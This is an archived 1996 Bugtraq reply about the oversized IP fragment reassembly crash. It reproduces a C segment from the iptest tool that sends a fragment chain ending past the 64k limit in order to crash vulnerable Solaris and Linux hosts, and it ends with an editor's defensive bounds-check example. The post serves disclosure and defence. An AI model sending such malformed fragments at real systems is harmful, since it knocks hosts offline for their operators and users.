Bugtraq mailing list archives

Re: Urgent !! Serious Linux Security Bug....


From: avalon () coombs anu edu au (Darren Reed)
Date: Tue, 22 Oct 1996 23:44:06 +1000


Solaris2 was, I believe, vulnerable to this bug too.
From the "Crashable" file for iptest:
        Solaris 2.4 - up to and including 101945-34, > 34 ?
        Solaris 2.5 - 11/95
(Yes, I stumbled upon this about the same time last year, but don't exactly
 have the time or resources to check everything under the sun, especially
 new operating systems...)
For those with it handy, "iptest -1 -p 8".

But I built in some random lossage which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course) is at max. 64k in size.

However, it doesn't try to send an ICMP packet; the following segment of
code is what triggers it:

        if (!ptest || (ptest == 8)) {
                struct  timeval tv;

                gettimeofday(&tv, NULL);
                srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
                /*
                 * Part8: 63k packet + 1k fragment at offset 0x1ffe
                 */
                ip->ip_off = IP_MF;
                u->uh_dport = htons(9);
                ip->ip_id = htons(id++);
                printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
                ip->ip_len = 768 + 20 + 8;
                /* the "random lossage": roughly 1 in 32 fragments is skipped */
                if ((rand() & 0x1f) != 0) {
                        (void) send_ip(nfd, mtu, ip, gwip, 1);
                        printf("%d\r", i);
                } else
                        printf("skip 0\n");

                ip->ip_len = MIN(768 + 20, mtu - 68);
                i = 512;
                for (; i < (63 * 1024 + 768); i += 768) {
                        ip->ip_off = IP_MF | (i >> 3);
                        if ((rand() & 0x1f) != 0) {
                                (void) send_ip(nfd, mtu, ip, gwip, 1);
                                printf("%d\r", i);
                        } else
                                printf("skip %d\n", i);
                        fflush(stdout);
                        PAUSE();
                }
                /* final fragment: MF still set, so reassembly never completes */
                ip->ip_len = 896 + 20;
                ip->ip_off = IP_MF | (i >> 3);
                if ((rand() & 0x1f) != 0) {
                        (void) send_ip(nfd, mtu, ip, gwip, 1);
                        printf("%d\r", i);
                } else
                        printf("skip\n");
                putchar('\n');
                fflush(stdout);
        }


Doesn't work against any system using BSD-based IP networking code.

Darren
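The bounds check that a reassembly routine needs before it copies fragment data into its fixed-size buffer, written here as an added example by the editor; it is not part of Darren Reed's message or of iptest. The `struct frag` layout, the constants, the helper names and the sample fragment set are assumptions constructed for the illustration; the sample mirrors the shape of the sequence in the code above (768 + 8 bytes at offset 0, 768-byte fragments from byte 512 upward, then 896 bytes at offset field 0x1ffe).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IPv4 limits.  The total-length field is 16 bits, so header plus payload
 * of a reassembled datagram can never legitimately exceed 65535 bytes; the
 * fragment offset field is 13 bits and counts 8-byte units. */
#define IP_MAXPACKET  65535u
#define IP_HDRLEN     20u          /* assumes no IP options */
#define IP_MF         0x2000u      /* "more fragments" flag in ip_off */
#define IP_OFFMASK    0x1fffu      /* fragment offset, in 8-byte units */

/* One fragment as a reassembly routine sees it after parsing the header
 * (constructed layout for this example): ip_off is the raw 16-bit field in
 * host byte order, data_len the number of payload bytes. */
struct frag {
    uint16_t ip_off;
    uint16_t data_len;
};

/* Reasons a fragment is refused; a real stack would count/log these. */
enum frag_verdict {
    FRAG_OK = 0,
    FRAG_TOO_LONG,      /* payload would end past the 64k datagram limit */
    FRAG_BAD_ALIGN      /* non-final fragment not a multiple of 8 bytes */
};

/* Byte offset at which this fragment's payload lands in the datagram. */
static uint32_t frag_start(const struct frag *f)
{
    return (uint32_t)(f->ip_off & IP_OFFMASK) * 8u;
}

/* Byte offset one past the end of this fragment's payload. */
static uint32_t frag_end(const struct frag *f)
{
    return frag_start(f) + f->data_len;
}

/* Validate a single fragment before any byte is copied into the buffer. */
enum frag_verdict frag_check(const struct frag *f)
{
    /* The reassembled datagram is IP_HDRLEN + highest payload end, and that
     * sum must fit the 16-bit total length.  Arithmetic is done in 32 bits
     * so the comparison cannot wrap the way a 16-bit "offset + len" would. */
    if (IP_HDRLEN + frag_end(f) > IP_MAXPACKET)
        return FRAG_TOO_LONG;
    /* Every fragment except the last must carry a multiple of 8 bytes,
     * otherwise no later fragment's offset can line up with it. */
    if ((f->ip_off & IP_MF) && (f->data_len % 8u) != 0)
        return FRAG_BAD_ALIGN;
    return FRAG_OK;
}

/* Convenience wrapper taking the raw header values. */
enum frag_verdict frag_check_raw(uint16_t ip_off, uint16_t data_len)
{
    struct frag f = { ip_off, data_len };
    return frag_check(&f);
}

/* Walk a whole fragment set, stopping at the first bad fragment.  On success
 * *total_len receives the datagram size once reassembled.  Returns the index
 * of the offending fragment, or -1 if all are acceptable. */
int frag_set_check(const struct frag *frags, size_t n, uint32_t *total_len)
{
    uint32_t high = 0;
    for (size_t i = 0; i < n; i++) {
        if (frag_check(&frags[i]) != FRAG_OK)
            return (int)i;
        if (frag_end(&frags[i]) > high)
            high = frag_end(&frags[i]);
    }
    *total_len = IP_HDRLEN + high;
    return -1;
}

/* Constructed sample fragment set shaped like the sequence in the post. */
#define N_SAMPLE 4
static const struct frag sample[N_SAMPLE] = {
    { IP_MF | 0,           768 + 8 },   /* first fragment, byte 0       */
    { IP_MF | (512 >> 3),  768 },       /* second fragment, byte 512    */
    { IP_MF | (1280 >> 3), 768 },       /* third fragment, byte 1280    */
    { IP_MF | 0x1ffe,      896 },       /* byte 65520 + 896 = 66416     */
};

/* Index of the first rejected sample fragment (-1 if none). */
int sample_bad_index(void)
{
    uint32_t total = 0;
    return frag_set_check(sample, N_SAMPLE, &total);
}

int main(void)
{
    int bad = sample_bad_index();
    if (bad < 0)
        printf("all %d fragments fit\n", N_SAMPLE);
    else
        printf("fragment %d rejected: offset %u + %u bytes exceeds 64k\n",
               bad, frag_start(&sample[bad]), sample[bad].data_len);
    return 0;
}
```

Note that any fragment at offset field 0x1ffe (byte 65520) is refused regardless of its length, because 20 header bytes plus 65520 already exceed 65535; the largest legitimate final fragment starts at field 0x1ffd (byte 65512) and carries at most 3 bytes. Doing the comparison in 32-bit arithmetic matters: a 16-bit sum of offset and length would wrap and pass the check.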